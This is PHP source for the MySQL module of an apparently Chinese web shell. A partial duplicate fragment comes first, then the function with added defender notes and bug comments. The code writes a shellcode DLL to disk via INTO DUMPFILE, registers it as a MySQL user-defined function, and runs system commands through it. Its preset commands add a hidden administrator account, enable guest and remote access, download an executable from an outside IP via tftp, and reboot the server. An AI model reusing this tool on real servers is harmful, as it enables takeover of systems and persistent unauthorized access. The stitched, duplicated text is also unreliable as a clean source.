$sqlcmd = 'ver';
 if (isset($_POST['mhost']) && isset($_POST['muser'])) {
     $mhost = $_POST['mhost'];
     $muser = $_POST['muser'];
     $mpass = $_POST['mpass'];
     $mdata = $_POST['mdata'];
     $mport = $_POST['mport'];
     $mpath = File_Str($_POST['mpath']);
     $sqlcmd = $_POST['sqlcmd'];
     $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass);
     if ($conn) {
         @mysql_select_db($mdata);
         if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) {
             $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
             if (@mysql_query($query, $conn)) {
                 $shellcode = Mysql_shellcode();
                 $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
                 if (@mysql_query($query, $conn)) {
                     $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';';
                     if (@mysql_query($query, $conn)) {
                         $ap = explode('/', $mpath);
                         $inpath = array_pop($ap);
                         $query = 'Create Function state returns string soname \'' . $inpath . '\';';
                         $MSG_BOX = @mysql_query($query, $conn) ? '安装DLL成功' : '安装DLL失败';
                     } else {
                         $MSG_BOX = '导出DLL文件失败';
                     }
                 } else {
                     $MSG_BOX = '写入临时表失败';
                 }
                 @mysql_query('DROP TABLE Envl_Temp_Tab;', $conn);
/**
 * Renders the "MySQL" tab of this tool and handles its two POST actions.
 *
 * On a POST carrying mhost/muser it connects to MySQL with the submitted
 * host, port, user, password and database, then:
 *  - outdll: stores the bytes returned by Mysql_shellcode() in a temporary
 *    table, writes them to the server's filesystem at the submitted mpath
 *    via `SELECT ... INTO DUMPFILE`, and registers that file as a MySQL
 *    user-defined function named `state` with `CREATE FUNCTION ... SONAME`.
 *  - runcmd: calls `state(<sqlcmd>)` and prints the returned rows in the
 *    page's textarea.
 *
 * Defender notes:
 *  - Server-side artifacts of this routine: a table named Spider_Temp_Tab
 *    being created and dropped, a DUMPFILE write, a `CREATE FUNCTION state
 *    RETURNS STRING SONAME` statement and subsequent `select state("...")`
 *    calls in the general/audit log, and a new row in mysql.func.
 *  - The chain depends on a database account holding the FILE privilege and
 *    INSERT on mysql.func, and on the dump landing in the server's plugin
 *    directory; a restrictive secure_file_priv, a least-privilege DB account
 *    and a non-writable plugin_dir each break it.
 *
 * Code defects (documented, not fixed):
 *  - Every POST value is concatenated straight into SQL and echoed back raw
 *    into HTML attributes in the heredoc (no htmlspecialchars()).
 *  - $infotmp is never initialised and $k is bumped per row, so row N reads
 *    column index N instead of column 0.
 *  - mysql_* functions were removed in PHP 7; all failures are hidden by @.
 *  - File_Str() and Mysql_shellcode() are defined outside this chunk.
 *
 * @return true Always; output is emitted via print.
 */
function Mysql_m()
{
    // Default form state shown before any POST.
    $MSG_BOX = '先导出DLL再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
    $info = '回显';
    $mhost = 'localhost';
    $muser = '******';
    $mport = '3306';
    $mpass = '';
    $mdata = 'mysql';
    $mpath = 'C:/windows/mysqlDll.dll';
    $sqlcmd = 'ver';
    // Only mhost/muser are checked with isset(); the other fields are read
    // unconditionally and raise notices when absent.
    if (isset($_POST['mhost']) && isset($_POST['muser'])) {
        $mhost = $_POST['mhost'];
        $muser = $_POST['muser'];
        $mpass = $_POST['mpass'];
        $mdata = $_POST['mdata'];
        $mport = $_POST['mport'];
        // File_Str() is defined elsewhere; presumably a path normaliser — verify.
        $mpath = File_Str($_POST['mpath']);
        $sqlcmd = $_POST['sqlcmd'];
        // Deprecated/removed mysql_* API; "host:port" form of the first argument.
        $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass);
        if ($conn) {
            // Return value ignored: a failed database selection is silently tolerated.
            @mysql_select_db($mdata);
            if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) {
                // Temporary staging table; its creation/drop is a log artifact.
                $query = "CREATE TABLE Spider_Temp_Tab (spider BLOB);";
                if (@mysql_query($query, $conn)) {
                    // Mysql_shellcode() (defined elsewhere) supplies the library bytes
                    // as a SQL literal that is spliced into the INSERT unquoted.
                    $shellcode = Mysql_shellcode();
                    $query = "INSERT into Spider_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
                    if (@mysql_query($query, $conn)) {
                        // Writes the blob to the server filesystem; requires the FILE
                        // privilege and is subject to secure_file_priv. $mpath is not escaped.
                        $query = 'SELECT spider FROM Spider_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';';
                        if (@mysql_query($query, $conn)) {
                            // SONAME takes a bare file name resolved against the server's
                            // plugin_dir, so the dump above must have landed in that directory.
                            $ap = explode('/', $mpath);
                            $inpath = array_pop($ap);
                            $query = 'Create Function state returns string soname \'' . $inpath . '\';';
                            // Messages: "DLL install succeeded" / "DLL install failed".
                            $MSG_BOX = @mysql_query($query, $conn) ? '安装DLL成功' : '安装DLL失败';
                        } else {
                            // "Exporting the DLL file failed".
                            $MSG_BOX = '导出DLL文件失败';
                        }
                    } else {
                        // "Writing to the temporary table failed".
                        $MSG_BOX = '写入临时表失败';
                    }
                    // Cleanup runs regardless of the INSERT/DUMPFILE outcome.
                    @mysql_query('DROP TABLE Spider_Temp_Tab;', $conn);
                } else {
                    // "Creating the temporary table failed".
                    $MSG_BOX = '创建临时表失败';
                }
            }
            if (!empty($_POST['runcmd'])) {
                // $sqlcmd is interpolated into a double-quoted SQL string unescaped.
                $query = 'select state("' . $sqlcmd . '");';
                $result = @mysql_query($query, $conn);
                if ($result) {
                    $k = 0;
                    $info = NULL;
                    // BUG: $infotmp is never initialised, and $k increments per row,
                    // so the N-th row reads column index N (undefined beyond column 0).
                    while ($row = @mysql_fetch_array($result)) {
                        $infotmp .= $row[$k];
                        $k++;
                    }
                    $info = $infotmp;
                    // "Execution succeeded" / "Execution failed".
                    $MSG_BOX = '执行成功';
                } else {
                    $MSG_BOX = '执行失败';
                }
            }
        } else {
            // "Connecting to MySQL failed".
            $MSG_BOX = '连接MYSQL失败';
        }
    }
    // Every {$var} below is interpolated raw into HTML/JS — no escaping.
    print <<<END
<script language="javascript">
function Fullm(i){
\tStr = new Array(11);
\tStr[0] = "ver";
\tStr[1] = "net user silic silic /add";
\tStr[2] = "net localgroup administrators silic /add";
\tStr[3] = "net start Terminal Services";
\tStr[4] = "netstat -an";
\tStr[5] = "ipconfig";
\tStr[6] = "net user guest /active:yes";
\tStr[7] = "copy c:\\\\1.php d:\\\\2.php";
\tStr[8] = "tftp -i 123.234.222.1 get a.exe c:\\\\a.exe";
\tStr[9] = "net start telnet";
\tStr[10] = "shutdown -r -t 0";
\tmform.sqlcmd.value = Str[i];
\treturn true;
}
</script>
<form method="POST" name="mform" id="mform" action="?s=m">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<center><div class="actall">
地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
端口 <input type="text" name="mport" value="{$mport}" style="width:110px">
用户 <input type="text" name="muser" value="{$muser}" style="width:110px">
密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px">
库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div><div class="actall">
可加载路径 <input type="text" name="mpath" value="{$mpath}" style="width:555px"> 
<input type="submit" name="outdll" value="安装DLL" style="width:80px;"></div>
<div class="actall">安装成功后可用 <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515px;">
<select onchange="return Fullm(options[selectedIndex].value)">
<option value="0" selected>--命令集合--</option>
<option value="1">添加管理员</option>
<option value="2">设为管理组</option>
<option value="3">开启远程桌面</option>
<option value="4">查看端口</option>
<option value="5">查看IP</option>
<option value="6">激活guest帐户</option>
<option value="7">复制文件</option>
<option value="8">ftp下载</option>
<option value="9">开启telnet</option>
<option value="10">重启</option>
</select>
<input type="submit" name="runcmd" value="执行" style="width:80px;">
<textarea style="width:720px;height:300px;">{$info}</textarea>
</div></center>
</form>
END;
    return true;
}